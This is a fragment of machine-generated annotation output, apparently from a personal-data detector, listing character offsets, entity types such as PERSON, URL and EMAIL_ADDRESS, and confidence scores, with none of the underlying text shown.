end: 2745, score: 0.85, type: LOCATION, start: 3071, end: 3081, score: 0.85, type: PERSON, start: 3547, end: 3562, score: 0.85, type: DATE_TIME, start: 4153, end: 4162, score: 0.85, type: LOCATION, start: 4840, end: 4856, score: 0.85, type: PERSON, start: 4986, end: 4997, score: 0.85, type: PERSON, start: 5420, end: 5431, score: 0.85, type: PERSON, start: 5868, end: 5879, score: 0.85, type: PERSON, start: 6318, end: 6329, score: 0.85, type: PERSON, start: 6478, end: 6481, score: 0.85, type: PERSON, start: 6891, end: 6902, score: 0.85, type: PERSON, start: 7051, end: 7054, score: 0.85, type: PERSON, start: 8277, end: 8291, score: 0.85, type: PERSON, start: 8961, end: 8968, score: 0.85, type: LOCATION, start: 9117, end: 9125, score: 0.85, type: LOCATION, start: 10149, end: 10171, score: 0.85, type: PERSON, start: 11791, end: 11802, score: 0.85, type: PERSON, start: 12663, end: 12671, score: 0.85, type: PERSON, start: 13615, end: 13618, score: 0.85, type: LOCATION, start: 13947, end: 13969, score: 0.85, type: PERSON, start: 15989, end: 16020, score: 0.85, type: PERSON, start: 16106, end: 16109, score: 0.85, type: PERSON, start: 16176, end: 16180, score: 0.85, type: PERSON, start: 16191, end: 16210, score: 0.85, type: PERSON, start: 16466, end: 16472, score: 0.85, type: PERSON, start: 16966, end: 16972, score: 0.85, type: PERSON, start: 17624, end: 17628, score: 0.85, type: LOCATION, start: 17790, end: 17819, score: 0.85, type: LOCATION, start: 17922, end: 17952, score: 0.85, type: LOCATION, start: 18367, end: 18398, score: 0.85, type: LOCATION, start: 19185, end: 19216, score: 0.85, type: LOCATION, start: 19542, end: 19573, score: 0.85, type: LOCATION, start: 20229, end: 20260, score: 0.85, type: NRP, start: 22534, end: 22541, score: 0.85, type: LOCATION, start: 22646, end: 22654, score: 0.85, type: PERSON, start: 22669, end: 22685, score: 0.85, type: PERSON, start: 23821, end: 23853, score: 0.85, type: LOCATION, start: 24512, end: 24535, score: 0.85, type: PERSON, start: 26412, end: 26420, score: 0.85, type: LOCATION, start: 26549, end: 26553, score: 0.85, type: PERSON, start: 26736, end: 26747, score: 0.85, type: URL, start: 239, end: 249, score: 0.5, type: URL, start: 601, end: 621, score: 0.5, type: URL, start: 636, end: 651, score: 0.5, type: URL, start: 686, end: 706, score: 0.5, type: URL, start: 739, end: 756, score: 0.5, type: URL, start: 1437, end: 1441, score: 0.5, type: URL, start: 1475, end: 1479, score: 0.5, type: URL, start: 1793, end: 1798, score: 0.5, type: URL, start: 1807, end: 1812, score: 0.5, type: URL, start: 1852, end: 1862, score: 0.5, type: URL, start: 2160, end: 2166, score: 0.5, type: URL, start: 2228, end: 2233, score: 0.5, type: URL, start: 2524, end: 2535, score: 0.5, type: URL, start: 2560, end: 2570, score: 0.5, type: URL, start: 2796, end: 2802, score: 0.5, type: URL, start: 2852, end: 2858, score: 0.5, type: URL, start: 2905, end: 2911, score: 0.5, type: URL, start: 2937, end: 2951, score: 0.5, type: URL, start: 2966, end: 2972, score: 0.5, type: URL, start: 3149, end: 3162, score: 0.5, type: URL, start: 3299, end: 3310, score: 0.5, type: URL, start: 3543, end: 3549, score: 0.5, type: URL, start: 3569, end: 3573, score: 0.5, type: URL, start: 3588, end: 3602, score: 0.5, type: URL, start: 3608, end: 3612, score: 0.5, type: URL, start: 3918, end: 3924, score: 0.5, type: URL, start: 3988, end: 4002, score: 0.5, type: URL, start: 4092, end: 4106, score: 0.5, type: URL, start: 4197, end: 4203, score: 0.5, type: URL, start: 4342, end: 4348, score: 0.5, type: URL, start: 4377, end: 4391, score: 0.5, type: URL, start: 4415, end: 4421, score: 0.5, type: URL, start: 4559, end: 4566, score: 0.5, type: URL, start: 4590, end: 4604, score: 0.5, type: URL, start: 4634, end: 4648, score: 0.5, type: URL, start: 4683, end: 4690, score: 0.5, type: URL, start: 4772, end: 4786, score: 0.5, type: URL, start: 4795, end: 4802, score: 0.5, type: URL, start: 4840, end: 4847, score: 0.5, type: URL, start: 4897, end: 4908, score: 0.5, type: URL, start: 4948, end: 4959, score: 0.5, type: URL, start: 5031, end: 5037, score: 0.5, type: URL, start: 5067, end: 5081, score: 0.5, type: URL, start: 5231, end: 5237, score: 0.5, type: URL, start: 5331, end: 5342, score: 0.5, type: URL, start: 5382, end: 5393, score: 0.5, type: URL, start: 5472, end: 5478, score: 0.5, type: URL, start: 5508, end: 5522, score: 0.5, type: URL, start: 5679, end: 5685, score: 0.5, type: URL, start: 5779, end: 5790, score: 0.5, type: URL, start: 5830, end: 5841, score: 0.5, type: URL, start: 5913, end: 5919, score: 0.5, type: URL, start: 5949, end: 5963, score: 0.5, type: URL, start: 6129, end: 6135, score: 0.5, type: URL, start: 6229, end: 6240, score: 0.5, type: URL, start: 6280, end: 6291, score: 0.5, type: URL, start: 6363, end: 6369, score: 0.5, type: URL, start: 6399, end: 6413, score: 0.5, type: URL, start: 6467, end: 6481, score: 0.5, type: URL, start: 6583, end: 6594, score: 0.5, type: URL, start: 6615, end: 6621, score: 0.5, type: URL, start: 6768, end: 6773, score: 0.5, type: URL, start: 6802, end: 6813, score: 0.5, type: URL, start: 6853, end: 6864, score: 0.5, type: URL, start: 6936, end: 6942, score: 0.5, type: URL, start: 6972, end: 6986, score: 0.5, type: URL, start: 7040, end: 7054, score: 0.5, type: URL, start: 7156, end: 7167, score: 0.5, type: URL, start: 7188, end: 7194, score: 0.5, type: URL, start: 7306, end: 7317, score: 0.5, type: URL, start: 7363, end: 7374, score: 0.5, type: URL, start: 7447, end: 7452, score: 0.5, type: URL, start: 7584, end: 7589, score: 0.5, type: URL, start: 7600, end: 7605, score: 0.5, type: URL, start: 7632, end: 7639, score: 0.5, type: URL, start: 7673, end: 7679, score: 0.5, type: URL, start: 7783, end: 7789, score: 0.5, type: URL, start: 7844, end: 7854, score: 0.5, type: URL, start: 7894, end: 7900, score: 0.5, type: URL, start: 7987, end: 7994, score: 0.5, type: URL, start: 8088, end: 8105, score: 0.5, type: URL, start: 8124, end: 8134, score: 0.5, type: URL, start: 8195, end: 8205, score: 0.5, type: URL, start: 8215, end: 8232, score: 0.5, type: URL, start: 8302, end: 8312, score: 0.5, type: URL, start: 8322, end: 8327, score: 0.5, type: URL, start: 8481, end: 8486, score: 0.5, type: URL, start: 8497, end: 8502, score: 0.5, type: URL, start: 8529, end: 8536, score: 0.5, type: URL, start: 8570, end: 8576, score: 0.5, type: URL, start: 8631, end: 8637, score: 0.5, type: URL, start: 8768, end: 8774, score: 0.5, type: URL, start: 8884, end: 8891, score: 0.5, type: URL, start: 8986, end: 9003, score: 0.5, type: URL, start: 9028, end: 9038, score: 0.5, type: URL, start: 9204, end: 9209, score: 0.5, type: URL, start: 9362, end: 9367, score: 0.5, type: URL, start: 9378, end: 9383, score: 0.5, type: URL, start: 9410, end: 9417, score: 0.5, type: URL, start: 9451, end: 9457, score: 0.5, type: URL, start: 9588, end: 9594, score: 0.5, type: URL, start: 9698, end: 9704, score: 0.5, type: URL, start: 9815, end: 9822, score: 0.5, type: URL, start: 9989, end: 9995, score: 0.5, type: URL, start: 10012, end: 10018, score: 0.5, type: URL, start: 10105, end: 10110, score: 0.5, type: URL, start: 10263, end: 10268, score: 0.5, type: URL, start: 10279, end: 10284, score: 0.5, type: URL, start: 10311, end: 10318, score: 0.5, type: URL, start: 10352, end: 10358, score: 0.5, type: URL, start: 10489, end: 10495, score: 0.5, type: URL, start: 10599, end: 10605, score: 0.5, type: URL, start: 10716, end: 10723, score: 0.5, type: URL, start: 10880, end: 10886, score: 0.5, type: URL, start: 10954, end: 10960, score: 0.5, type: URL, start: 10977, end: 10983, score: 0.5, type: URL, start: 11242, end: 11247, score: 0.5, type: URL, start: 11567, end: 11572, score: 0.5, type: URL, start: 11616, end: 11621, score: 0.5, type: URL, start: 11660, end: 11666, score: 0.5, type: URL, start: 11692, end: 11698, score: 0.5, type: URL, start: 11728, end: 11741, score: 0.5, type: URL, start: 11744, end: 11750, score: 0.5, type: URL, start: 11836, end: 11847, score: 0.5, type: URL, start: 12058, end: 12063, score: 0.5, type: URL, start: 12094, end: 12099, score: 0.5, type: URL, start: 12110, end: 12115, score: 0.5, type: URL, start: 12148, end: 12153, score: 0.5, type: URL, start: 12192, end: 12198, score: 0.5, type: URL, start: 12224, end: 12230, score: 0.5, type: URL, start: 12278, end: 12291, score: 0.5, type: URL, start: 12294, end: 12300, score: 0.5, type: URL, start: 12379, end: 12390, score: 0.5, type: URL, start: 12485, end: 12491, score: 0.5, type: URL, start: 12517, end: 12523, score: 0.5, type: URL, start: 12572, end: 12585, score: 0.5, type: URL, start: 12588, end: 12594, score: 0.5, type: URL, start: 12674, end: 12685, score: 0.5, type: URL, start: 12735, end: 12741, score: 0.5, type: URL, start: 12767, end: 12773, score: 0.5, type: URL, start: 12803, end: 12816, score: 0.5, type: URL, start: 12819, end: 12825, score: 0.5, type: URL, start: 12905, end: 12916, score: 0.5, type: URL, start: 13007, end: 13012, score: 0.5, type: URL, start: 13093, end: 13109, score: 0.5, type: URL, start: 13148, end: 13155, score: 0.5, type: URL, start: 13226, end: 13233, score: 0.5, type: URL, start: 13286, end: 13293, score: 0.5, type: URL, start: 13351, end: 13358, score: 0.5, type: URL, start: 13424, end: 13431, score: 0.5, type: URL, start: 13498, end: 13505, score: 0.5, type: URL, start: 13549, end: 13556, score: 0.5, type: URL, start: 13686, end: 13692, score: 0.5, type: URL, start: 13740, end: 13746, score: 0.5, type: URL, start: 13947, end: 13953, score: 0.5, type: URL, start: 14002, end: 14008, score: 0.5, type: URL, start: 14066, end: 14072, score: 0.5, type: URL, start: 14098, end: 14112, score: 0.5, type: URL, start: 14148, end: 14162, score: 0.5, type: URL, start: 14214, end: 14228, score: 0.5, type: URL, start: 14281, end: 14295, score: 0.5, type: URL, start: 14348, end: 14354, score: 0.5, type: URL, start: 14402, end: 14408, score: 0.5, type: URL, start: 14463, end: 14469, score: 0.5, type: URL, start: 14495, end: 14509, score: 0.5, type: URL, start: 14559, end: 14565, score: 0.5, type: URL, start: 15143, end: 15153, score: 0.5, type: URL, start: 15818, end: 15838, score: 0.5, type: URL, start: 15890, end: 15896, score: 0.5, type: URL, start: 15966, end: 15977, score: 0.5, type: URL, start: 16000, end: 16010, score: 0.5, type: URL, start: 16060, end: 16066, score: 0.5, type: URL, start: 16095, end: 16109, score: 0.5, type: URL, start: 16129, end: 16135, score: 0.5, type: URL, start: 16165, end: 16178, score: 0.5, type: URL, start: 16200, end: 16213, score: 0.5, type: URL, start: 16245, end: 16251, score: 0.5, type: URL, start: 16536, end: 16542, score: 0.5, type: URL, start: 16665, end: 16679, score: 0.5, type: URL, start: 16780, end: 16794, score: 0.5, type: URL, start: 16849, end: 16856, score: 0.5, type: URL, start: 17021, end: 17035, score: 0.5, type: URL, start: 17206, end: 17220, score: 0.5, type: URL, start: 17374, end: 17388, score: 0.5, type: URL, start: 17472, end: 17492, score: 0.5, type: URL, start: 17790, end: 17807, score: 0.5, type: URL, start: 17922, end: 17940, score: 0.5, type: URL, start: 17976, end: 17993, score: 0.5, type: URL, start: 18145, end: 18151, score: 0.5, type: URL, start: 18177, end: 18191, score: 0.5, type: URL, start: 18257, end: 18263, score: 0.5, type: URL, start: 18400, end: 18406, score: 0.5, type: URL, start: 18416, end: 18425, score: 0.5, type: URL, start: 18542, end: 18548, score: 0.5, type: URL, start: 18558, end: 18567, score: 0.5, type: URL, start: 18607, end: 18613, score: 0.5, type: URL, start: 18639, end: 18653, score: 0.5, type: URL, start: 18719, end: 18725, score: 0.5, type: URL, start: 18829, end: 18842, score: 0.5, type: URL, start: 18937, end: 18943, score: 0.5, type: URL, start: 18969, end: 18983, score: 0.5, type: URL, start: 19049, end: 19055, score: 0.5, type: URL, start: 19218, end: 19224, score: 0.5, type: URL, start: 19250, end: 19256, score: 0.5, type: URL, start: 19282, end: 19296, score: 0.5, type: URL, start: 19362, end: 19368, score: 0.5, type: URL, start: 19472, end: 19485, score: 0.5, type: URL, start: 19575, end: 19581, score: 0.5, type: URL, start: 19607, end: 19613, score: 0.5, type: URL, start: 19639, end: 19653, score: 0.5, type: URL, start: 19719, end: 19725, score: 0.5, type: URL, start: 19829, end: 19842, score: 0.5, type: URL, start: 19937, end: 19943, score: 0.5, type: URL, start: 19969, end: 19983, score: 0.5, type: URL, start: 20049, end: 20055, score: 0.5, type: URL, start: 20159, end: 20172, score: 0.5, type: URL, start: 20262, end: 20268, score: 0.5, type: URL, start: 20322, end: 20328, score: 0.5, type: URL, start: 20354, end: 20368, score: 0.5, type: URL, start: 20412, end: 20418, score: 0.5, type: URL, start: 20444, end: 20458, score: 0.5, type: URL, start: 20524, end: 20530, score: 0.5, type: URL, start: 20761, end: 20767, score: 0.5, type: URL, start: 20793, end: 20807, score: 0.5, type: URL, start: 20851, end: 20857, score: 0.5, type: URL, start: 20883, end: 20897, score: 0.5, type: URL, start: 20964, end: 20970, score: 0.5, type: URL, start: 21206, end: 21212, score: 0.5, type: URL, start: 21238, end: 21252, score: 0.5, type: URL, start: 21296, end: 21302, score: 0.5, type: URL, start: 21328, end: 21342, score: 0.5, type: URL, start: 21409, end: 21415, score: 0.5, type: URL, start: 21719, end: 21725, score: 0.5, type: URL, start: 21789, end: 21796, score: 0.5, type: URL, start: 21814, end: 21821, score: 0.5, type: URL, start: 21871, end: 21876, score: 0.5, type: URL, start: 21911, end: 21923, score: 0.5, type: URL, start: 21947, end: 21954, score: 0.5, type: URL, start: 22015, end: 22021, score: 0.5, type: URL, start: 22049, end: 22056, score: 0.5, type: URL, start: 22085, end: 22091, score: 0.5, type: URL, start: 22133, end: 22139, score: 0.5, type: URL, start: 22167, end: 22173, score: 0.5, type: URL, start: 22278, end: 22285, score: 0.5, type: URL, start: 22319, end: 22325, score: 0.5, type: URL, start: 22368, end: 22381, score: 0.5, type: URL, start: 22438, end: 22451, score: 0.5, type: URL, start: 22499, end: 22512, score: 0.5, type: URL, start: 22615, end: 22629, score: 0.5, type: URL, start: 22675, end: 22688, score: 0.5, type: URL, start: 22732, end: 22745, score: 0.5, type: URL, start: 22767, end: 22785, score: 0.5, type: URL, start: 22828, end: 22835, score: 0.5, type: URL, start: 22863, end: 22876, score: 0.5, type: URL, start: 22890, end: 22896, score: 0.5, type: URL, start: 22916, end: 22922, score: 0.5, type: URL, start: 22948, end: 22961, score: 0.5, type: URL, start: 22979, end: 22992, score: 0.5, type: URL, start: 23002, end: 23015, score: 0.5, type: URL, start: 23031, end: 23044, score: 0.5, type: URL, start: 23278, end: 23291, score: 0.5, type: URL, start: 23410, end: 23417, score: 0.5, type: URL, start: 23451, end: 23457, score: 0.5, type: URL, start: 23505, end: 23523, score: 0.5, type: URL, start: 23566, end: 23573, score: 0.5, type: URL, start: 23685, end: 23692, score: 0.5, type: URL, start: 23918, end: 23936, score: 0.5, type: URL, start: 23947, end: 23954, score: 0.5, type: URL, start: 24040, end: 24049, score: 0.5, type: URL, start: 24078, end: 24085, score: 0.5, type: URL, start: 24120, end: 24126, score: 0.5, type: URL, start: 24154, end: 24160, score: 0.5, type: URL, start: 24195, end: 24204, score: 0.5, type: URL, start: 24255, end: 24261, score: 0.5, type: URL, start: 24302, end: 24308, score: 0.5, type: URL, start: 24345, end: 24351, score: 0.5, type: URL, start: 24386, end: 24392, score: 0.5, type: URL, start: 24435, end: 24441, score: 0.5, type: URL, start: 24469, end: 24475, score: 0.5, type: URL, start: 24586, end: 24591, score: 0.5, type: URL, start: 24622, end: 24627, score: 0.5, type: URL, start: 24638, end: 24643, score: 0.5, type: URL, start: 24676, end: 24681, score: 0.5, type: URL, start: 24712, end: 24719, score: 0.5, type: URL, start: 24749, end: 24754, score: 0.5, type: URL, start: 24799, end: 24804, score: 0.5, type: URL, start: 24832, end: 24846, score: 0.5, type: URL, start: 24886, end: 24900, score: 0.5, type: URL, start: 24914, end: 24921, score: 0.5, type: URL, start: 24951, end: 24956, score: 0.5, type: URL, start: 24996, end: 25001, score: 0.5, type: URL, start: 25029, end: 25038, score: 0.5, type: URL, start: 25047, end: 25061, score: 0.5, type: URL, start: 25100, end: 25114, score: 0.5, type: URL, start: 25143, end: 25150, score: 0.5, type: URL, start: 25180, end: 25185, score: 0.5, type: URL, start: 25225, end: 25230, score: 0.5, type: URL, start: 25258, end: 25272, score: 0.5, type: URL, start: 25290, end: 25297, score: 0.5, type: URL, start: 25333, end: 25338, score: 0.5, type: URL, start: 25366, end: 25375, score: 0.5, type: URL, start: 25384, end: 25398, score: 0.5, type: URL, start: 25407, end: 25412, score: 0.5, type: URL, start: 25532, end: 25537, score: 0.5, type: URL, start: 25568, end: 25573, score: 0.5, type: URL, start: 25584, end: 25589, score: 0.5, type: URL, start: 25608, end: 25615, score: 0.5, type: URL, start: 25651, end: 25656, score: 0.5, type: URL, start: 25691, end: 25705, score: 0.5, type: URL, start: 25733, end: 25738, score: 0.5, type: URL, start: 25764, end: 25782, score: 0.5, type: URL, start: 25830, end: 25837, score: 0.5, type: URL, start: 25873, end: 25878, score: 0.5, type: URL, start: 25906, end: 25920, score: 0.5, type: URL, start: 25960, end: 25974, score: 0.5, type: URL, start: 25983, end: 26001, score: 0.5, type: URL, start: 26044, end: 26051, score: 0.5, type: URL, start: 26087, end: 26092, score: 0.5, type: URL, start: 26120, end: 26129, score: 0.5, type: URL, start: 26138, end: 26152, score: 0.5, type: URL, start: 26161, end: 26179, score: 0.5, type: URL, start: 26222, end: 26229, score: 0.5, type: URL, start: 26265, end: 26270, score: 0.5, type: URL, start: 26298, end: 26312, score: 0.5, type: URL, start: 26325, end: 26330, score: 0.5, type: URL, start: 26820, end: 26827, score: 0.5, type: MEDICAL_LICENSE, start: 1375, end: 1384, score: 1.0, type: URL, start: 1316, end: 1386, score: 0.95, type: LOCATION, start: 73, end: 83, score: 0.85, type: LOCATION, start: 1480, end: 1502, score: 0.85, type: URL, start: 1503, end: 1508, score: 0.85, type: URL, start: 2366, end: 2374, score: 0.85, type: URL, start: 3678, end: 3685, score: 0.85, type: URL, start: 4633, end: 4638, score: 0.85, type: PERSON, start: 4916, end: 4949, score: 0.85, type: URL, start: 5493, end: 5498, score: 0.85, type: URL, start: 5928, end: 5940, score: 0.85, type: URL, start: 6117, end: 6129, score: 0.85, type: PERSON, start: 6734, end: 6768, score: 0.85, type: URL, start: 1776, end: 1856, score: 0.6, type: URL, start: 2066, end: 2160, score: 0.6, type: URL, start: 3521, end: 3608, score: 0.6, type: URL, start: 950, end: 957, score: 0.5, type: URL, start: 2301, end: 2308, score: 0.5, type: URL, start: 2464, end: 2472, score: 0.5, type: URL, start: 2592, end: 2599, score: 0.5, type: URL, start: 2846, end: 2853, score: 0.5, type: URL, start: 3736, end: 3750, score: 0.5, type: URL, start: 3879, end: 3887, score: 0.5, type: URL, start: 4173, end: 4180, score: 0.5, type: URL, start: 4923, end: 4928, score: 0.5, type: URL, start: 5028, end: 5035, score: 0.5, type: URL, start: 5219, end: 5226, score: 0.5, type: URL, start: 5426, end: 5433, score: 0.5, type: URL, start: 5671, end: 5683, score: 0.5, type: URL, start: 5692, end: 5697, score: 0.5, type: URL, start: 5851, end: 5858, score: 0.5, type: URL, start: 6180, end: 6192, score: 0.5, type: URL, start: 6328, end: 6335, score: 0.5, type: URL, start: 6365, end: 6372, score: 0.5, type: URL, start: 6432, end: 6439, score: 0.5, type: URL, start: 6525, end: 6532, score: 0.5, type: URL, start: 6614, end: 6621, score: 0.5, type: URL, start: 6670, end: 6677, score: 0.5, type: URL, start: 6752, end: 6759, score: 0.5, type: EMAIL_ADDRESS, start: 171, end: 186, score: 1.0, type: EMAIL_ADDRESS, start: 206, end: 221, score: 1.0, type: DATE_TIME, start: 126, end: 130, score: 0.85, type: PERSON, start: 131, end: 143, score: 0.85, type: PERSON, start: 158, end: 186, score: 0.85, type: PERSON, start: 541, end: 545, score: 0.85, type: PERSON, start: 1042, end: 1058, score: 0.85, type: PERSON, start: 1379, end: 1407, score: 0.85, type: PERSON, start: 2266, end: 2279, score: 0.85, type: URL, start: 3032, end: 3039, score: 0.85, type: URL, start: 3085, end: 3090, score: 0.85, type: URL, start: 3132, end: 3139, score: 0.85, type: PERSON, start: 3265, end: 3281, score: 0.85, type: PERSON, start: 3598, end: 3611, score: 0.85, type: PERSON, start: 3911, end: 3927, score: 0.85, type: PERSON, start: 3930, end: 3946, score: 0.85, type: PERSON, start: 4197, end: 4213, score: 0.85, type: PERSON, start: 4216, end: 4232, score: 0.85, type: PERSON, start: 4319, end: 4352, score: 0.85, type: PERSON, start: 4431, end: 4447, score: 0.85, type: PERSON, start: 4450, end: 4466, score: 0.85, type: PERSON, start: 4529, end: 4545, score: 0.85, type: PERSON, start: 4608, end: 4624, score: 0.85, type: PERSON, start: 4825, end: 4841, score: 0.85, type: PERSON, start: 4926, end: 4941, score: 0.85, type: PERSON, start: 5060, end: 5076, score: 0.85, type: PERSON, start: 7197, end: 7213, score: 0.85, type: PERSON, start: 8300, end: 8316, score: 0.85, type: PERSON, start: 8472, end: 8486, score: 0.85, type: PERSON, start: 9193, end: 9209, score: 0.85, type: URL, start: 9409, end: 9416, score: 0.85, type: URL, start: 9523, end: 9530, score: 0.85, type: URL, start: 9610, end: 9617, score: 0.85, type: PERSON, start: 9807, end: 9823, score: 0.85, type: URL, start: 177, end: 186, score: 0.5, type: URL, start: 212, end: 221, score: 0.5, type: URL, start: 406, end: 419, score: 0.5, type: URL, start: 627, end: 635, score: 0.5, type: URL, start: 642, end: 647, score: 0.5, type: URL, start: 722, end: 730, score: 0.5, type: URL, start: 750, end: 757, score: 0.5, type: URL, start: 853, end: 860, score: 0.5, type: URL, start: 894, end: 901, score: 0.5, type: URL, start: 929, end: 936, score: 0.5, type: URL, start: 947, end: 954, score: 0.5, type: URL, start: 1061, end: 1066, score: 0.5, type: URL, start: 1152, end: 1157, score: 0.5, type: URL, start: 1187, end: 1194, score: 0.5, type: URL, start: 1232, end: 1237, score: 0.5, type: URL, start: 1299, end: 1306, score: 0.5, type: URL, start: 1344, end: 1349, score: 0.5, type: URL, start: 1424, end: 1429, score: 0.5, type: URL, start: 1489, end: 1496, score: 0.5, type: URL, start: 1530, end: 1535, score: 0.5, type: URL, start: 1633, end: 1638, score: 0.5, type: URL, start: 1700, end: 1707, score: 0.5, type: URL, start: 1745, end: 1750, score: 0.5, type: URL, start: 1780, end: 1787, score: 0.5, type: URL, start: 1834, end: 1839, score: 0.5, type: URL, start: 1869, end: 1876, score: 0.5, type: URL, start: 1923, end: 1928, score: 0.5, type: URL, start: 1990, end: 1997, score: 0.5, type: URL, start: 2035, end: 2040, score: 0.5, type: URL, start: 2124, end: 2129, score: 0.5, type: URL, start: 2159, end: 2166, score: 0.5, type: URL, start: 2310, end: 2317, score: 0.5, type: URL, start: 2352, end: 2357, score: 0.5, type: URL, start: 2391, end: 2398, score: 0.5, type: URL, start: 2463, end: 2468, score: 0.5, type: URL, start: 2503, end: 2510, score: 0.5, type: URL, start: 2576, end: 2581, score: 0.5, type: URL, start: 2614, end: 2621, score: 0.5, type: URL, start: 2685, end: 2690, score: 0.5, type: URL, start: 2725, end: 2732, score: 0.5, type: URL, start: 2798, end: 2803, score: 0.5, type: URL, start: 2847, end: 2854, score: 0.5, type: URL, start: 2921, end: 2926, score: 0.5, type: URL, start: 2969, end: 2976, score: 0.5, type: URL, start: 3284, end: 3289, score: 0.5, type: URL, start: 3374, end: 3379, score: 0.5, type: URL, start: 3454, end: 3459, score: 0.5, type: URL, start: 3482, end: 3489, score: 0.5, type: URL, start: 3648, end: 3653, score: 0.5, type: URL, start: 3679, end: 3686, score: 0.5, type: URL, start: 3736, end: 3741, score: 0.5, type: URL, start: 3930, end: 3935, score: 0.5, type: URL, start: 3989, end: 3996, score: 0.5, type: URL, start: 4032, end: 4037, score: 0.5, type: URL, start: 4216, end: 4221, score: 0.5, type: URL, start: 4243, end: 4250, score: 0.5, type: URL, start: 4295, end: 4300, score: 0.5, type: URL, start: 4450, end: 4455, score: 0.5, type: URL, start: 4477, end: 4484, score: 0.5, type: URL, start: 4529, end: 4534, score: 0.5, type: URL, start: 4556, end: 4563, score: 0.5, type: URL, start: 4608, end: 4613, score: 0.5, type: URL, start: 4687, end: 4692, score: 0.5, type: URL, start: 4844, end: 4849, score: 0.5, type: URL, start: 4872, end: 4880, score: 0.5, type: URL, start: 4926, end: 4931, score: 0.5, type: URL, start: 5079, end: 5084, score: 0.5, type: URL, start: 5166, end: 5171, score: 0.5, type: URL, start: 5260, end: 5265, score: 0.5, type: URL, start: 5296, end: 5303, score: 0.5, type: URL, start: 5349, end: 5354, score: 0.5, type: URL, start: 5385, end: 5392, score: 0.5, type: URL, start: 5436, end: 5443, score: 0.5, type: URL, start: 5465, end: 5472, score: 0.5, type: URL, start: 5568, end: 5575, score: 0.5, type: URL, start: 5755, end: 5763, score: 0.5, type: URL, start: 5777, end: 5784, score: 0.5, type: URL, start: 5810, end: 5817, score: 0.5, type: URL, start: 5822, end: 5830, score: 0.5, type: URL, start: 5926, end: 5933, score: 0.5, type: URL, start: 5950, end: 5957, score: 0.5, type: URL, start: 6011, end: 6016, score: 0.5, type: URL, start: 6073, end: 6077, score: 0.5, type: URL, start: 6201, end: 6205, score: 0.5, type: URL, start: 6380, end: 6387, score: 0.5, type: URL, start: 6423, end: 6428, score: 0.5, type: URL, start: 6508, end: 6512, score: 0.5, type: URL, start: 6636, end: 6640, score: 0.5, type: URL, start: 6734, end: 6741, score: 0.5, type: URL, start: 6777, end: 6782, score: 0.5, type: URL, start: 6868, end: 6872, score: 0.5, type: URL, start: 6993, end: 6997, score: 0.5, type: URL, start: 7216, end: 7221, score: 0.5, type: URL, start: 7258, end: 7265, score: 0.5, type: URL, start: 7314, end: 7319, score: 0.5, type: URL, start: 7356, end: 7363, score: 0.5, type: URL, start: 7412, end: 7417, score: 0.5, type: URL, start: 7446, end: 7453, score: 0.5, type: URL, start: 7502, end: 7507, score: 0.5, type: URL, start: 7546, end: 7553, score: 0.5, type: URL, start: 7600, end: 7605, score: 0.5, type: URL, start: 7643, end: 7650, score: 0.5, type: URL, start: 7696, end: 7701, score: 0.5, type: URL, start: 7736, end: 7743, score: 0.5, type: URL, start: 7786, end: 7791, score: 0.5, type: URL, start: 7827, end: 7834, score: 0.5, type: URL, start: 7878, end: 7883, score: 0.5, type: URL, start: 7972, end: 7977, score: 0.5, type: URL, start: 8015, end: 8022, score: 0.5, type: URL, start: 8068, end: 8073, score: 0.5, type: URL, start: 8155, end: 8160, score: 0.5, type: URL, start: 8319, end: 8324, score: 0.5, type: URL, start: 8422, end: 8427, score: 0.5, type: URL, start: 8525, end: 8530, score: 0.5, type: URL, start: 8624, end: 8631, score: 0.5, type: URL, start: 8656, end: 8661, score: 0.5, type: URL, start: 8732, end: 8736, score: 0.5, type: URL, start: 8824, end: 8828, score: 0.5, type: URL, start: 8914, end: 8918, score: 0.5, type: URL, start: 9006, end: 9010, score: 0.5, type: URL, start: 9093, end: 9100, score: 0.5, type: URL, start: 9212, end: 9217, score: 0.5, type: URL, start: 9279, end: 9285, score: 0.5, type: URL, start: 9349, end: 9356, score: 0.5, type: URL, start: 9689, end: 9696, score: 0.5, type: URL, start: 9826, end: 9831, score: 0.5, type: URL, start: 9859, end: 9866, score: 0.5, type: URL, start: 9909, end: 9914, score: 0.5, type: URL, start: 9943, end: 9950, score: 0.5, type: URL, start: 9994, end: 9999, score: 0.5, type: URL, start: 10067, end: 10074, score: 0.5, type: URL, start: 10108, end: 10113, score: 0.5, type: URL, start: 10144, end: 10151, score: 0.5, type: URL, start: 10197, end: 10202, score: 0.5, type: URL, start: 10233, end: 10240, score: 0.5, type: URL, start: 10286, end: 10291, score: 0.5, type: URL, start: 10320, end: 10327, score: 0.5, type: URL, start: 10371, end: 10376, score: 0.5, type: URL, start: 10405, end: 10412, score: 0.5, type: EMAIL_ADDRESS, start: 218, end: 233, score: 1.0, type: PERSON, start: 1153, end: 1158, score: 0.85, type: URL, start: 381, end: 417, score: 0.6, type: IP_ADDRESS, start: 1105, end: 1106, score: 0.6, type: IP_ADDRESS, start: 1118, end: 1122, score: 0.6, type: URL, start: 74, end: 80, score: 0.5, type: URL, start: 224, end: 233, score: 0.5, type: URL, start: 540, end: 546, score: 0.5, type: URL, start: 547, end: 557, score: 0.5, type: URL, start: 578, end: 583, score: 0.5, type: URL, start: 584, end: 594, score: 0.5, type: URL, start: 614, end: 621, score: 0.5, type: URL, start: 622, end: 632, score: 0.5, type: URL, start: 654, end: 661, score: 0.5, type: URL, start: 662, end: 672, score: 0.5, type: URL, start: 694, end: 701, score: 0.5, type: URL, start: 702, end: 712, score: 0.5, type: URL, start: 734, end: 739, score: 0.5, type: URL, start: 740, end: 750, score: 0.5, type: URL, start: 770, end: 775, score: 0.5, type: URL, start: 776, end: 786, score: 0.5, type: URL, start: 806, end: 814, score: 0.5, type: URL, start: 815, end: 825, score: 0.5, type: URL, start: 848, end: 853, score: 0.5, type: URL, start: 854, end: 864, score: 0.5, type: URL, start: 884, end: 892, score: 0.5, type: URL, start: 893, end: 903, score: 0.5, type: URL, start: 946, end: 953, score: 0.5, type: EMAIL_ADDRESS, start: 79, end: 94, score: 1.0, type: DATE_TIME, start: 57, end: 61, score: 0.85, type: PERSON, start: 62, end: 78, score: 0.85, type: LOCATION, start: 791, end: 797, score: 0.85, type: LOCATION, start: 817, end: 820, score: 0.85, type: LOCATION, start: 1204, end: 1206, score: 0.85, type: LOCATION, start: 1281, end: 1283, score: 0.85, type: URL, start: 26, end: 39, score: 0.5, type: URL, start: 85, end: 94, score: 0.5, type: URL, start: 991, end: 996, score: 0.5, type: URL, start: 1074, end: 1080, score: 0.5, type: URL, start: 1107, end: 1120, score: 0.5, type: URL, start: 1296, end: 1302, score: 